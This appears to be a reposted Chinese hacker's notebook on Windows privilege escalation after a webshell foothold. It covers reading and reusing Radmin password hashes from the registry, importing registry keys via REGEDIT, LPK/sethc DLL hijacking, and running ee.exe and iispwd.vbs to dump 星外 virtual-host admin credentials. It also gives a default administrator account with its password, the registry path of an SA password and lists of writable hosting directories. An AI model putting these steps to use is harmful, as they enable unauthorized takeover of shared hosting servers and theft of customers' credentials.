提权笔记本(4)

【radmin/4899/4899提权/radmin提权】
思路:读取radmin密码知晓密码的十进制然后转化为十六进制得到正确的密码,远程连接

以下是密码储存注册表地址:
HKEY_LOCAL_MACHINE\SYSTEM\RAdmin\v2.0\Server\Parameters\Parameter
以下是端口储存注册表地址:
HKEY_LOCAL_MACHINE\SYSTEM\RAdmin\v2.0\Server\Parameters\port

读取出来的是十进制的密码,要转换成十六进制。记得要小写!!!
现在仿佛很多shell里面都自带的有radmin提权,你懂~
然后用[Radmin_Hash.exe]进行用HEX直接连接(连接的时候记得小写).可能因为版本的缘故,仿佛现在radmin已经更新到3.0了 上面这个仿佛可能不管用。
--------------------------------------------------------------------------------
常见虚拟主机常见路径
D:\virtualhost\web580651\www\ 新网虚拟主机

F:\usr\fw04408\xpinfo\ 万网虚拟主机
D:\hosting\wwwroot\ Prim@Hosting虚拟主机
e:\wwwroot\longzhihu\wwwroot\ 华众虚拟主机
d:\freehost\zhoudeyang\web\ 星外虚拟主机主机
D:\vhostroot\LocalUser\gdrt\ 星外分支
f:\host\wz8088\web\ 星外分支
D:\vhostroot\localuser\ vhostroot

###源于互联网,恐咱纰漏
radmin2.1提权

RADMIN的注册表项位于HKEY_LOCAL_MACHINE\SYSTEM\RAdmin\v2.0\Server\Parameters\ Parameter(在这个键值保存着密码)
在本机安装radmin,,把上面的密码键值导出,上传到webshell的可写目录中

cmd下执行下列2行的命令:
REGEDIT -E C:\123.REG HKEY_LOCAL_MACHINE\SYSTEM\RAdmin\v2.0\Server\Parameters (导出密码文件到c盘,c盘要有可写目录)
此步骤可以省略,直接导入本机的密码,实验通过。
REGEDIT -s C:\456.REG HKEY_LOCAL_MACHINE\SYSTEM\RAdmin\v2.0\Server\Parameters (导入密码到注册表)

然后本机连接服务器ip,密码是本地radmin密码
###结束###

【LPK提权/lpk 提权/LPKtiquan/lpk tiquan】
所用工具:tools lpk sethc v4.0.exe

要提前设置好热键,然后连接远程的时候按五下shift 然后在按你设置的热键,多按几次吧,
lpk.dll存在于可执行程序目录中会自动被调用,直接放到网站上面去,然后执行一个exe就可以触发该漏洞。

【星外主机/星外虚拟主机/星外提权/7i24/freehost/7i24目录/freehost目录/xingwai/xingwaizuji/】
如何知道是不是星外主机?
1.看到网站目录在这个文件夹下(freehost)或者(7i24)则很有可能是星外了
2.asp大马里点击程序,存在“7i24虚拟主机管理平台”“星外主机”之类的文件夹
3.开始菜单哪儿也是可以看到底

拿到星外果断先登陆一下他默认账号密码。
注:在星外中一般不允许上传解析格式的文件呢(asp之类的)但是阔以上传.com或者.txt的
星外主机提权思路(1.ee.exe提权 2.vbs提权 3.注册表获得sa密码/星外sa提权)
[One]ee.exe提权法
找个可读可写目录上传ee.exe
c:\Program Files\Microsoft SQL Server\100\Shared\ErrorDumps\ee.exe
cmd命令:/c c:\windows\temp\cookies\ee.exe-i(获取星外帐号的id值,例如回显:FreeHostID:724)
接着命令:/c c:\windows\temp\cookies\ee.exe-u724(获取星外的帐号密码)
远程连接之

[Two]vbs提权法
找个可读可写目录上传cscript.exe和iispwd.vbs
cmd执行:/c "c:\windows\temp\cookies\cscript.exe"c:\windows\temp\cookies\iispwd.vbs
意思是读取iis,不但可以获取星外的帐号密码(在最下),还可以看到同服务器上的所有站点的目录。
读取到了数据以后找一下ctrl+f搜索一下“7i24”在其旁边就有加密的账号密码
默认帐号:freehostrunat
默认密码:fa41328538d7be36e83ae91a78a1b16f!7 /*明文,没有加密直接登录!*/
这个用户是安装星外时自动建立的,已属于administrators管理组,而且密码不需要解密,直接登录服务器即可!

[Three]sa提权
星外sa密码注册表位置:HKEY_LOCAL_MACHINE\SYSTEM\LIWEIWENSOFT\INSTALLFREEADMIN\11

[PS]:安全模式大部分是存在于星外主机上,其他主机出现较少!
而且星外主机提权最好用aspx大马,因为权限比较高,提权成功率就比较高!

星外常写目录:
C:RECYCLER
C:windowstemp
e:recycler
f:recycler
C:phpPEAR
C:WINDOWS7i24.comFreeHost
C:phpdev
C:System Volume Information
C:7i24.comserverdoctorlog
C:WINDOWSTemp
c:windowshchiblis.ibl
C:7i24.comiissafelog
C:7i24.comLinkGatelog
C:Program FilesThunder NetworkThunder7
C:Program FilesThunder NetworkThunder
C:Program FilesSymantec AntiVirusSAVRT
c:windowsDriverPacksCAM2
C:Program FilesFlashFXP
c:Program FilesMicrosoft SQL Server90SharedErrorDumps
C:Program FilesZendZendOptimizer-3.3.0
C:Program FilesCommon Files
c:Documents and SettingsAll UsersApplication DataHagel TechnologiesDU Meterlog.csv
c:Program Files360360SafedeepscanSectionmutex.db
c:Program FilesHeliconISAPI_Rewrite3error.log
c:Program FilesHeliconISAPI_Rewrite3Rewrite.log
c:Program FilesHeliconISAPI_Rewrite3httpd.conf
c:Program FilesCommon FilesSymantec SharedPersist.bak
c:Program FilesCommon FilesSymantec SharedValidate.dat
c:Program FilesCommon FilesSymantec SharedValidate.dat
C:Program FilesZendZendOptimizer-3.3.0docs
C:Documents and SettingsAll UsersDRM
C:Documents and SettingsAll UsersApplication DataMcAfeeDesktopProtection
C:Documents and SettingsAll UsersApplication Data360safesoftmgr
C:Program FilesZendZendOptimizer-3.3.0libOptimizer-3.3.0php-5.2.xZendOptimizer.dll
C:Documents and SettingsAll UsersApplication DataMicrosoftMedia Index
转载请注明本文链接: http://www.mayidui.net/t2296.html
游客
登录后才可以回帖,登录 或者 注册